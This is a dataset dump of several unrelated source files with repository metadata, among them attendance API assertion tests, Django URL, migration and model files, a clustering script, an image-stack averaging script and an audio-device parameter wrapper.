resInfo_10_29 = res_resultDict_2019_10['result']['list'][28]
resInfo_10_30 = res_resultDict_2019_10['result']['list'][29]
resInfo_10_31 = res_resultDict_2019_10['result']['list'][30]
assert ass.assert_in_text(resInfo_10_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_05, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_06, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_09, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_17, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_29, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_31, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_11 = json.loads(res_resultText_2019_11)
resInfo_11_01 = res_resultDict_2019_11['result']['list'][0]
resInfo_11_02 = res_resultDict_2019_11['result']['list'][1]
resInfo_11_03 = res_resultDict_2019_11['result']['list'][2]
resInfo_11_04 = res_resultDict_2019_11['result']['list'][3]
resInfo_11_05 = res_resultDict_2019_11['result']['list'][4]
resInfo_11_06 = res_resultDict_2019_11['result']['list'][5]
resInfo_11_07 = res_resultDict_2019_11['result']['list'][6]
resInfo_11_08 = res_resultDict_2019_11['result']['list'][7]
resInfo_11_09 = res_resultDict_2019_11['result']['list'][8]
resInfo_11_10 = res_resultDict_2019_11['result']['list'][9]
resInfo_11_11 = res_resultDict_2019_11['result']['list'][10]
resInfo_11_12 = res_resultDict_2019_11['result']['list'][11]
resInfo_11_13 = res_resultDict_2019_11['result']['list'][12]
resInfo_11_14 = res_resultDict_2019_11['result']['list'][13]
resInfo_11_15 = res_resultDict_2019_11['result']['list'][14]
resInfo_11_16 = res_resultDict_2019_11['result']['list'][15]
resInfo_11_17 = res_resultDict_2019_11['result']['list'][16]
resInfo_11_18 = res_resultDict_2019_11['result']['list'][17]
resInfo_11_19 = res_resultDict_2019_11['result']['list'][18]
resInfo_11_20 = res_resultDict_2019_11['result']['list'][19]
resInfo_11_21 = res_resultDict_2019_11['result']['list'][20]
resInfo_11_22 = res_resultDict_2019_11['result']['list'][21]
resInfo_11_23 = res_resultDict_2019_11['result']['list'][22]
resInfo_11_24 = res_resultDict_2019_11['result']['list'][23]
resInfo_11_25 = res_resultDict_2019_11['result']['list'][24]
resInfo_11_26 = res_resultDict_2019_11['result']['list'][25]
resInfo_11_27 = res_resultDict_2019_11['result']['list'][26]
resInfo_11_28 = res_resultDict_2019_11['result']['list'][27]
resInfo_11_29 = res_resultDict_2019_11['result']['list'][28]
resInfo_11_30 = res_resultDict_2019_11['result']['list'][29]
assert ass.assert_in_text(resInfo_11_01, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_07, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_08, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_12, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_15, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_17, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_18, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_21, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_22, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_25, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_29, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_12 = json.loads(res_resultText_2019_12)
resInfo_12_01 = res_resultDict_2019_12['result']['list'][0]
resInfo_12_02 = res_resultDict_2019_12['result']['list'][1]
resInfo_12_03 = res_resultDict_2019_12['result']['list'][2]
resInfo_12_04 = res_resultDict_2019_12['result']['list'][3]
resInfo_12_05 = res_resultDict_2019_12['result']['list'][4]
resInfo_12_06 = res_resultDict_2019_12['result']['list'][5]
resInfo_12_07 = res_resultDict_2019_12['result']['list'][6]
resInfo_12_08 = res_resultDict_2019_12['result']['list'][7]
resInfo_12_09 = res_resultDict_2019_12['result']['list'][8]
resInfo_12_10 = res_resultDict_2019_12['result']['list'][9]
resInfo_12_11 = res_resultDict_2019_12['result']['list'][10]
resInfo_12_12 = res_resultDict_2019_12['result']['list'][11]
resInfo_12_13 = res_resultDict_2019_12['result']['list'][12]
resInfo_12_14 = res_resultDict_2019_12['result']['list'][13]
resInfo_12_15 = res_resultDict_2019_12['result']['list'][14]
resInfo_12_16 = res_resultDict_2019_12['result']['list'][15]
resInfo_12_17 = res_resultDict_2019_12['result']['list'][16]
resInfo_12_18 = res_resultDict_2019_12['result']['list'][17]
resInfo_12_19 = res_resultDict_2019_12['result']['list'][18]
resInfo_12_20 = res_resultDict_2019_12['result']['list'][19]
resInfo_12_21 = res_resultDict_2019_12['result']['list'][20]
resInfo_12_22 = res_resultDict_2019_12['result']['list'][21]
resInfo_12_23 = res_resultDict_2019_12['result']['list'][22]
resInfo_12_24 = res_resultDict_2019_12['result']['list'][23]
resInfo_12_25 = res_resultDict_2019_12['result']['list'][24]
resInfo_12_26 = res_resultDict_2019_12['result']['list'][25]
resInfo_12_27 = res_resultDict_2019_12['result']['list'][26]
assert ass.assert_in_text(resInfo_12_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_03, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_10, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_11, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_13, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_16, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_17, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_19, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_20, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_23, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_24, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_26, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_27, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
if __name__ == '__main__':
a = Attendance_analyse_late_02()
a.test_late_02()
| [
"1065913054@qq.com"
] | 1065913054@qq.com |
be8cefb2b3391ff0cda8c4d056368c0dead896e7 | 91e782eeb433a22f661d1e50a191a36b0e16b289 | /root/urls.py | dc080d62524d0e06c2d6af0f5f090b7ca1d27cd9 | [] | no_license | yramanii/budget | 5d6f8e43c6492595c79b1d4e33833393e17f0bcd | 533728c69058433405892254f74c68db03069c36 | refs/heads/main | 2023-07-09T10:13:07.947423 | 2021-08-20T07:27:13 | 2021-08-20T07:27:13 | 398,193,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | """root URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('app.urls'))
]
| [
"ramaniyash19@gmail.com"
] | ramaniyash19@gmail.com |
b2c50001eb73bf92411cc92db6f9729ad10ce817 | ed04425041ff7c18eb60d27dda5353ba3b65974b | /src/agglomerative.py | 588a82fd1a0ab38da127f7c54fbabdb3ff55eca6 | [] | no_license | alexmi256/colordiff | 36e927b5acb72f61bc50a17cbfed4221e42c8e61 | db91e0a10a0d8b1d1e3f734ca4c67635344f2b55 | refs/heads/main | 2023-03-15T09:32:23.209377 | 2021-03-08T02:19:47 | 2021-03-08T02:19:47 | 345,106,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # TODO: Look into https://baoilleach.blogspot.com/2014/01/convert-distance-matrix-to-2d.html
# https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html#sklearn.cluster.AgglomerativeClustering
# https://www.datatechnotes.com/2019/10/agglomerative-clustering-example-in.html
from sklearn.cluster import AgglomerativeClustering
from src.example import make_matrix, print_clusters
# Try out AgglomerativeClustering
colors, distance_matrix = make_matrix()
aggloclust = AgglomerativeClustering(
n_clusters=None, affinity="precomputed", linkage="average", distance_threshold=28
).fit(distance_matrix)
labels = aggloclust.labels_
if -1 in labels:
print("There were no clusters found")
else:
print_clusters(colors, labels, distance_matrix)
| [
"alexmi3.14@gmail.com"
] | alexmi3.14@gmail.com |
3278d42f28e4adebbe01bf582c688739941488df | 8e95e79840005f6c34dfb978e8fe6e0ec4f7f643 | /9_Introduction to PySpark_/33_Test vs Train.py | 658938186f8e89f8ce821abc3d047cec0a15515f | [] | no_license | Naysla/Machine_Learning | a0593cac41ef1561f14bec55780570b82fc37720 | e75d5cd2894ccb005228ab3da87dde9025385a08 | refs/heads/master | 2023-02-01T17:19:32.413609 | 2020-12-22T20:36:45 | 2020-12-22T20:36:45 | 323,708,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #Test vs Train
#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
#By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
| [
"60472499+Naysla@users.noreply.github.com"
] | 60472499+Naysla@users.noreply.github.com |
92694715d35c931f58ea9fdacff0c277bec3d3a8 | 5ffed81ced523b6e417b4e48d20380b6f16f8f42 | /exam/football_souvenirs.py | 867e2341fa443122f3abe1f9ea0b7f84ec5776db | [] | no_license | Nikoletazl/Basics-Python | 0f3f095bd51f9546c681e3cdd268232de88749ab | 17aef1b95814f13a02053681aae3e617e56f2fe6 | refs/heads/main | 2023-08-14T15:48:48.450249 | 2021-10-08T15:02:35 | 2021-10-08T15:02:35 | 415,027,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,959 | py | team = input()
souvenirs = input()
count_souvenirs = int(input())

# Unit price per souvenir, keyed by souvenir type and then by country.
# Replaces four near-identical if/elif chains (~60 duplicated lines) with
# a single lookup table; output messages are unchanged.
PRICES = {
    "flags": {"Argentina": 3.25, "Brazil": 4.20, "Croatia": 2.75, "Denmark": 3.10},
    "caps": {"Argentina": 7.20, "Brazil": 8.50, "Croatia": 6.90, "Denmark": 6.50},
    "posters": {"Argentina": 5.10, "Brazil": 5.35, "Croatia": 4.95, "Denmark": 4.80},
    "stickers": {"Argentina": 1.25, "Brazil": 1.20, "Croatia": 1.10, "Denmark": 0.90},
}

if souvenirs not in PRICES:
    # Unknown souvenir type is checked first, exactly as in the original chain.
    print("Invalid stock!")
elif team not in PRICES[souvenirs]:
    print("Invalid country!")
else:
    price = count_souvenirs * PRICES[souvenirs][team]
    print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
| [
"noreply@github.com"
] | Nikoletazl.noreply@github.com |
57ec67cddca13e7cf0f7dd96aedbda84abd79280 | fd8427d85222f7f24ae7b45b444ff4d3e910a3f7 | /posts/migrations/0002_auto_20200702_1317.py | 21f99f64fa8cd0aa9c129ff415e844ebfb8c2eea | [] | no_license | angeljerry0047/Omokaa-Vue | 8e49939364f6cb945e88ef1a0493881038004798 | 2642c3cddb118d52931673873d2160f028ee9e41 | refs/heads/main | 2023-08-19T08:17:59.646215 | 2021-10-05T08:33:54 | 2021-10-05T08:33:54 | 413,730,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | # Generated by Django 3.0.7 on 2020-07-02 12:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration for the ``posts`` app.

    Adds the Category/Currency/Type/SubCategory lookup tables and relaxes
    the corresponding ``Post`` foreign keys to nullable SET_NULL references.
    Auto-generated migrations should not normally be edited by hand.
    """
    dependencies = [
        ('posts', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Currency',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Type',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='SubCategory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Category')),
            ],
        ),
        migrations.AddField(
            model_name='category',
            name='type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Type'),
        ),
        migrations.AlterField(
            model_name='post',
            name='category',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Category'),
        ),
        migrations.AlterField(
            model_name='post',
            name='currency',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Currency'),
        ),
        migrations.AlterField(
            model_name='post',
            name='sub_category',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.SubCategory'),
        ),
        migrations.AlterField(
            model_name='post',
            name='type',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Type'),
        ),
    ]
| [
"angeljerry0047@gmail.com"
] | angeljerry0047@gmail.com |
d8f1d4ac2ceb6dc54d7fafde61e9fa148276d68c | b7ce70c67689cc6f9d0a8bcf4b7a33468c865f69 | /4d_stack_avg.py | 109e5ce0b67d4e6686102fab745a1907ab78af05 | [] | no_license | tbutyl/OCT-flat | 10ac3cfe1c2de521f80ffb5300f4944f14bb1a59 | d80874185348e00b9bf9f360ed3e0572a8ca2780 | refs/heads/master | 2020-11-26T02:06:14.598059 | 2019-12-20T23:18:51 | 2019-12-20T23:18:51 | 228,932,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 15:02:27 2019
@author: Lab
"""
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 13:37:54 2019
@author: ebm
"""
from pathlib import Path
import sys
from tkinter.filedialog import askdirectory

import numpy as np
from skimage import io as io
def sort_key(pth):
    """Numeric sort key for a stack file: the integer that follows the
    9-character filename prefix (e.g. 'XXXXXXXXX123.tif' -> 123)."""
    numeric_suffix = pth.stem[9:]
    return int(numeric_suffix)
def avg(pth):
    """Average a flash time series of volume stacks.

    Every 32 consecutive ``*.tif`` files in ``pth`` are treated as one
    repetition of the same 32-volume acquisition; corresponding volumes of
    all repetitions are averaged and the result is written to
    ``pth/4d_avg_stack/avg_timeseries_stack.tif`` as float32.
    """
    save_pth = pth / '4d_avg_stack'
    save_pth.mkdir()
    files = sorted(pth.glob('*.tif'), key=sort_key)
    # ASSUMING 32 VOLUMES CAPTURED PER FLASH.
    # BUG FIX: the old check (`assert divisor/int(divisor)==1`) crashed
    # with ZeroDivisionError when fewer than 32 stacks were present
    # (int(divisor) == 0) instead of exiting with the intended message;
    # a modulo test covers all cases, including an empty folder.
    if not files or len(files) % 32 != 0:
        sys.exit('The number of stacks was not a multiple of 32.')
    divisor = len(files) // 32  # number of repetitions being averaged
    for i, file in enumerate(files):
        print(file)
        stk = io.imread(str(file))
        if i == 0:
            # BUG FIX: numpy was used here but never imported in this
            # module (NameError at runtime); `import numpy as np` added
            # to the module imports.
            avg_stack = np.empty((32, stk.shape[0], stk.shape[1], stk.shape[2]))
        if i < 32:
            # First repetition initializes each of the 32 slots.
            avg_stack[i, :, :, :] = stk / divisor
        else:
            avg_stack[i % 32, :, :, :] += stk / divisor
    io.imsave(fname=str(save_pth / 'avg_timeseries_stack.tif'),
              arr=avg_stack.astype('float32'))
def main():
    """Ask the user for the acquisition folder via a GUI dialog and
    average its stacks."""
    source = askdirectory()
    if source == '':
        # Dialog was cancelled -- nothing to do.
        sys.exit("\n\nExited: No file path selected\n\n")
    #sorting(Path(os.path.abspath(source)))
    avg(Path(source))
    print('done')
if __name__ == '__main__':
main()
| [
"ebmiller@ucdavis.edu"
] | ebmiller@ucdavis.edu |
132631fbc191c0d961db1e6783c48e19d8e8fd46 | 72d7cfbdd02f77300edb0f5e4104a1a147048ade | /djangoproject/myproject/users/migrations/0001_initial.py | e5e66726f68bb3366e771d7f04511d21d385f875 | [] | no_license | simrangrover5/batch430 | 33f3e59b7d2c70f87d796cc869855975ffef976a | ec841051d3a84cd56515aeff3b9d328cebea3705 | refs/heads/master | 2020-12-18T09:21:12.518412 | 2020-02-11T12:40:48 | 2020-02-11T12:40:48 | 235,325,192 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial auto-generated migration for the ``users`` app: creates the
    ``Adduser`` table, with ``email`` as the primary key.

    NOTE(review): ``password`` is a plain CharField -- confirm that hashing
    is applied elsewhere before values are stored.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Adduser',
            fields=[
                ('username', models.CharField(max_length=100, unique=True)),
                ('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
                ('password', models.CharField(max_length=100)),
                ('pic', models.ImageField(upload_to='')),
            ],
        ),
    ]
| [
"simrangrover5@gmail.com"
] | simrangrover5@gmail.com |
2be0ba7e8e25cc9d0b1e6cafbae03fd237e93a71 | dff26bd25d5189d9d44b2eb0fbb706fe6f39efab | /src/devices/audiofx/GrainDelay.py | 500239f87f062437e127b76ac670a33666f80049 | [] | no_license | princeofdarkness76/livemodel | e9e3ee6841ceb1b315ae43d635dab89ef2685692 | 70ea7f5fdf1bc0baa2e4a4bee48e115f23a1c3ea | refs/heads/master | 2018-01-10T20:02:41.003626 | 2016-01-12T18:40:59 | 2016-01-12T18:40:59 | 48,947,331 | 0 | 0 | null | 2016-01-12T18:34:21 | 2016-01-03T13:50:31 | Python | UTF-8 | Python | false | false | 2,382 | py | from LiveModel import DeviceBase
class GrainDelay(DeviceBase):
    """Parameter wrapper for the Grain Delay audio effect device.

    Each device parameter (``self.params[i]``, provided by ``DeviceBase``)
    is exposed both through getX/setX accessor methods and through a
    property; the property docstrings record the parameter index and value
    range (":Q" marks quantized parameters).  The uniform repetitive layout
    suggests this module was machine-generated from the device's parameter
    list -- prefer regenerating over hand-editing.
    """
    def __init__(self,device):
        DeviceBase.__init__(self, device)
    def getDeviceOn(self):
        return self.params[0].value
    def setDeviceOn(self,value):
        self.params[0].value = value
    deviceOn = property(getDeviceOn,setDeviceOn, doc='0 : Device On (0.0,1.0:Q)')
    def getSpray(self):
        return self.params[1].value
    def setSpray(self,value):
        self.params[1].value = value
    spray = property(getSpray,setSpray, doc='1 : Spray (0.0,1.0)')
    def getFrequency(self):
        return self.params[2].value
    def setFrequency(self,value):
        self.params[2].value = value
    frequency = property(getFrequency,setFrequency, doc='2 : Frequency (0.0,1.0)')
    def getPitch(self):
        return self.params[3].value
    def setPitch(self,value):
        self.params[3].value = value
    pitch = property(getPitch,setPitch, doc='3 : Pitch (-36.0,12.0)')
    def getRandom(self):
        return self.params[4].value
    def setRandom(self,value):
        self.params[4].value = value
    random = property(getRandom,setRandom, doc='4 : Random (0.0,1.0)')
    def getFeedback(self):
        return self.params[5].value
    def setFeedback(self,value):
        self.params[5].value = value
    feedback = property(getFeedback,setFeedback, doc='5 : Feedback (0.0,0.949999988079)')
    def getDrywet(self):
        return self.params[6].value
    def setDrywet(self,value):
        self.params[6].value = value
    drywet = property(getDrywet,setDrywet, doc='6 : DryWet (0.0,1.0)')
    def getDelayMode(self):
        return self.params[7].value
    def setDelayMode(self,value):
        self.params[7].value = value
    delayMode = property(getDelayMode,setDelayMode, doc='7 : Delay Mode (0.0,1.0:Q)')
    def getBeatDelay(self):
        return self.params[8].value
    def setBeatDelay(self,value):
        self.params[8].value = value
    beatDelay = property(getBeatDelay,setBeatDelay, doc='8 : Beat Delay (0.0,7.0:Q)')
    def getBeatSwing(self):
        return self.params[9].value
    def setBeatSwing(self,value):
        self.params[9].value = value
    beatSwing = property(getBeatSwing,setBeatSwing, doc='9 : Beat Swing (-0.333000004292,0.333000004292)')
    def getTimeDelay(self):
        return self.params[10].value
    def setTimeDelay(self,value):
        self.params[10].value = value
    timeDelay = property(getTimeDelay,setTimeDelay, doc='10 : Time Delay (1.0,128.0)')
| [
"marvotron@9d930748-7432-0410-9fcd-0fd381c6708b"
] | marvotron@9d930748-7432-0410-9fcd-0fd381c6708b |
80692a28f2335a303fd0ecefb7fd30fd697fdb1d | 2ba4c331a72ad89251ab4db9f404d7698b777d37 | /adhoc/models.py | ba16bef4ad425a382d55a6617de8c5e9af16912a | [] | no_license | hivefans/AnsiblePower | fd55121b8477092ff4ad830df44fd44f2e913666 | ad0c2b67f0c8cd9e7e0a2c6220277d2849965f7c | refs/heads/master | 2021-01-19T00:31:38.007147 | 2016-02-19T10:02:16 | 2016-02-19T10:02:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,675 | py | from __future__ import unicode_literals
from django.db import models
from ansible_auth.models import AuthUser
# Create your models here.
class AnsibleAdhoc(models.Model):
    """One ansible ad-hoc command run: module, host pattern, arguments,
    timing, and the user who launched it."""
    adhoc_name = models.CharField(max_length=45, blank=True, null=True)
    # Host pattern the ad-hoc command targets.
    adhoc_pattern = models.CharField(max_length=200, blank=True, null=True)
    # Module argument string passed to the ansible module.
    adhoc_args = models.CharField(max_length=200, blank=True, null=True)
    start_time = models.DateTimeField(blank=True, null=True)
    end_time = models.DateTimeField(blank=True, null=True)
    # NOTE(review): integer here but a BooleanField on AnsibleAdhocTask --
    # confirm the intended semantics (completion flag vs. counter).
    finish = models.IntegerField(blank=True, null=True)
    ansible_module = models.ForeignKey('AnsibleModule', models.DO_NOTHING)
    auth_user = models.ForeignKey(AuthUser, models.DO_NOTHING)
    class Meta:
        db_table = 'ansible_adhoc'
        ordering = ['-start_time']  # newest runs first
class AnsibleAdhocTask(models.Model):
    """Per-host result of an :class:`AnsibleAdhoc` run: completion and
    failure flags plus the captured stdout/stderr."""
    task_host = models.CharField(max_length=45, blank=True, null=True)
    start_time = models.DateTimeField(blank=True, null=True)
    end_time = models.DateTimeField(blank=True, null=True)
    finish = models.BooleanField(default=False)
    failure = models.BooleanField(default=False)
    stdout = models.TextField(blank=True, null=True)
    stderr = models.TextField(blank=True, null=True)
    ansible_adhoc = models.ForeignKey(AnsibleAdhoc, models.DO_NOTHING)
    class Meta:
        db_table = 'ansible_adhoc_task'
